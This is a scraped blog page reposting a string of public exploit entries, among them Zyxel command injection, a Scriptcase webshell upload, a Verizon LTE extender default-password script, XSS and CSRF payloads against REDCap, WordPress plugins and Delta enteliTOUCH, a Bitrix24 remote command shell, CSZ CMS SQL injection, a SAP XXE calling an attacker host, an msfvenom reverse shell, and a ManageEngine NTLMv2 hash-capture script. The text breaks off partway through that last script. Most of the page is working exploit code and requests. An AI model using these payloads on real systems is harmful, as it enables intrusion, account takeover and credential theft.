# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf ,
https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
HTTP Request :
POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863114659
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019
# Proof of Concept:
POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"
gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html
<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———
# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm
Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131
Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.
Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.
Tested on: lighttpd-web
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
17.02.2022
--
snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//
console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;
const doAjax = async () => {
const resp = await fetch(def);
if (resp.ok) {
const jsonyo = await resp.json();
return Promise.resolve(jsonyo);
} else {
return Promise.reject("Smth not rite captain!");
}
}
doAjax().then(console.log).catch(console.log);
await new Promise(t => setTimeout(t, 1337));
console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A
# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing
potentially dangerous characters to be inserted. This includes the reported payload, which
triggers a persistent Cross-Site Scripting (XSS).
# 2. Proof of Concept (PoC):
a. Install and activate version 1.7.4 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
c. Open the "Video example" or create a new one (whichever you prefer).
d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video)
the following payload:
" autofocus onfocus=alert(/XSS/)>.
e. Save the changes. "Edit" button.
f. JavaScript will be executed and a popup with the text "XSS" will be displayed.
Note: This change will be permanent until you modify the edited field.
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
# !/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning
"""
The domain users can be enumerated like userenum module of the kerbrute tool using this exploit.
If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.
"""
def request(target, user):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = target + 'ServletAPI/accounts/login'
data = {"loginName": user}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = requests.post(url, data=data, headers=headers, verify=False)
# For debugging
# print("[*] Response for " + user + ": " + req.text.strip())
if 'PASSWORD' in req.text:
print("[+] " + user + " is VALID!")
elif 'Your account has been disabled' in req.text:
print("[+] " + user + " account has been DISABLED.")
elif 'Your account has expired' in req.text:
print("[+] " + user + " account has EXPIRED.")
elif 'Enter the text as shown in the image.' in req.text:
print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
elif 'Permission Denied.' in req.text:
print("[-] " + user + " is not found.")
def get_users(target, file):
try:
file = open(file, "r")
for line in file:
line = line.strip()
time.sleep(0.5)
request(target, user=line)
except FileNotFoundError:
print("[-] File not found!")
sys.exit(1)
def main(args):
if len(args) != 3:
print("[*] Usage: %s url usernames_file" % (args[0]))
print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
sys.exit(1)
get_users(target=args[1], file=args[2])
if __name__ == "__main__":
main(args=sys.argv)
# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf
### Stored XSS – Missing Data Code Value (found by Kendrick Lam)
It was possible to store JavaScript as values for Missing Data Codes.
- Where: Missing Data Code.
- Payload:
<script>
var target = document.location.host;
var csrf_token = csrf_token;
var userId = '<userId>'; // Replace with your user ID.
function privesc()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.withCredentials = "true";
var body = "";
body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
xhr.send(body);
return true;
}
privesc();
</script>
- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
- Privileges:
+ Store: Low privileged user is able to store Missing Data Code values.
+ Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-03-03
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://wppopupmaker.com
# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
# Version: <1.16.5
# Tested on: WordPress 5.9 on Ubuntu 20.04
1. Description:
----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
2. Proof of Concept:
----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload)
Click 'Add' what triggers the XSS payload
Payload examples:
<script>alert('XSS');</script>
<img src=x onerror=alert('XSS')>
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
06.04.2022
-->
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
<input type="hidden" name="userInfo" value="" />
<input type="hidden" name="UL_SelectedOptionId" value="" />
<input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />
<input type="hidden" name="formAction" value="Delete" />
<input type="submit" value="CSRF XSS Alert!" />
</form>
</body>
</html>
# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
06.04.2022
-->
CSRF Add User:
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="zsl" />
<input type="hidden" name="Password" value="123t00t" />
<input type="hidden" name="AutoLogout" value="17" />
<input type="hidden" name="SS_SelectedOptionId" value="FIL28" />
<input type="hidden" name="ObjRef" value="" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Add" />
<input type="submit" value="Go for UserAdd" />
</form>
<br />
CSRF Change Admin Password (default: delta:login):
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="DELTA" />
<input type="hidden" name="Password" value="123456" />
<input type="hidden" name="AutoLogout" value="30" />
<input type="hidden" name="SS_SelectedOptionId" value="" />
<input type="hidden" name="ObjRef" value="ZSL-251" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Edit" />
<input type="submit" value="Go for UserEdit" />
</form>
</body>
</html>
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os
#/usr/bin/env python
#Created by heinjame
import requests
import re
from bs4 import BeautifulSoup
import argparse,sys
user_agent = {'User-agent': 'HeinJame'}
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Betrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
inputcmd = input(">>")
s = requests.Session()
def login():
postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)
def getsessionid():
sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",
headers = user_agent)
session = re.search(r"'bitrix_sessid':.*", sessionid.text)
extract = session.group(0).split(":")
realdata = extract[1].strip(" ")
realdata = realdata.replace("'","")
realdata = realdata.replace(",","")
return realdata
# print(r.text)
def cmdline(cmd,sessionid):
cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers
= user_agent, data = cmdline)
soup = BeautifulSoup(usercmd.content,'html.parser')
cmd = soup.find('p').getText()
print(cmd.rstrip())
login()
sessionid = getsessionid()
while inputcmd != "exit":
cmdline(inputcmd,sessionid)
inputcmd = input(">>")
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Author: LiquidWorm
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application suffers from a cleartext transmission/storage
of sensitive information in a Cookie. This allows a remote
attacker to intercept the HTTP Cookie authentication credentials
through a man-in-the-middle attack.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5704
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
06.04.2022
--
GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
Host: 192.168.0.210
Cache-Control: max-age=0
User-Agent: Toucher/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
Connection: close
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4
# Discovery of Vulnerability
- First go to CSZ CMS web page
- then go to http://yourhost/plugin/article directory on CMS.
- To see the error-based SQLi vulnerability, the ' character is entered in the search section.
- It is determined that the "p" parameter creates the vulnerability.
- Databases can be accessed with manual or automated tools.
# Proof of Concept
http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
# Sqlmap output:
Parameter: p (GET)
Type: error-based
Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit
# Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)
# Description:
The application "Wondershare Dr. Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist
All the folders that contain the binaries for the services have weak permissions.
These weak permissions allow any authenticated user to get SYSTEM privileges.
First, we need to check if services are running using the following command:
wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running
Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running
Now we need to check if we have enough privileges to replace the binaries:
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F) <= same here
...
icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F) <= and here
...
# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help")
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)
As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>
# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-25
# Vendor Homepage: https://itec.es/programas/
# Vulnerability Type: Unquoted Service Path Privilege Escalation
# Tested on OS: Microsoft Windows 11 Home
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
C:\Users\edgar>sc qc "ITeCProteccioAppServer"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ITeCProteccioAppServer
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ITeCProteccioAppServer
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\edgar>systeminfo
Nombre de host: DESKTOP-0DL5SID
Nombre del sistema operativo: Microsoft Windows 11 Home
Versión del sistema operativo: 10.0.22000 N/D Compilación 22000
# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-24
# Vendor Homepage: https://www.zte.com.cn/global/
# Tested Version: 2.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto
C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: UDisk Monitor Z5 Phone
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\edgar>systeminfo
Nombre de host: DESKTOP-810865D
Nombre del sistema operativo: Microsoft Windows 10 Pro
Versión del sistema operativo: 10.0.19044 N/D Compilación 19044
# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability
# Version: ADSelfService Plus Build < 6121
# Tested against: Build 6118
# CVE: CVE-2022-29457
# !/usr/bin/python3
import argparse
import requests
import urllib3
import random
import sys
"""
1-
a)Set up SMB server to capture NTMLv2 hash.
python3 smbserver.py share . -smb2support
b)For relaying to SMB:
python3 ntlmrelayx.py -smb2support -t smb://TARGET
c)For relaying to LDAP:
python3 ntlmrelayx.py -t ldaps://TARGET
2- Fire up the exploit.
You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes.
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_args():
parser = argparse.ArgumentParser(
epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")
parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')
parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')
parser.add_argument('-u', '--user', required=True, action='store')
parser.add_argument('-p', '--password', required=True, action='store')
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')
args = parser.parse_args()
return args
def scheduler(domain, auth, target, listener, user, password):
try:
with requests.Session() as s:
gUrl = target
getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)
csrf = getCsrf.cookies['_zcsr_tmp']
print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp'])
if auth.lower() == 'adselfservice':
auth = "ADSelfService Plus Authentication"
data = {
"loginName": user,
"domainName": auth,
"j_username": user,
"j_password": password,
"AUTHRULE_NAME": "ADAuthenticator",
"adscsrf": [csrf, csrf]
}
#Login
url = target + "j_security_check"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
#Auth Check
url2 = target + "webclient/index.html"
req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)
if req2.status_code == 200:
print("[+] Authentication is successful.")
elif req2.status_code == 302:
print("[-] Login failed.")
sys.exit(1)
else:
print("[-] Something went wrong")
sys.exit(1)
dn = domain.split(".")
r1 = random.randint(1, 1000)
surl = target + 'ServletAPI/Reports/saveReportScheduler'
data = {
'SCHEDULE_ID':'0',
'ADMIN_STATUS':'3',
'SCHEDULE_NAME': 'enrollment' + str(r1),
'DOMAINS': '["'+ domain +'"]',
'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}',
'SELECTED_REPORTS': '104,105',
'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',
'SCHEDULE_TYPE': 'hourly',
'TIME_OF_DAY': '0',
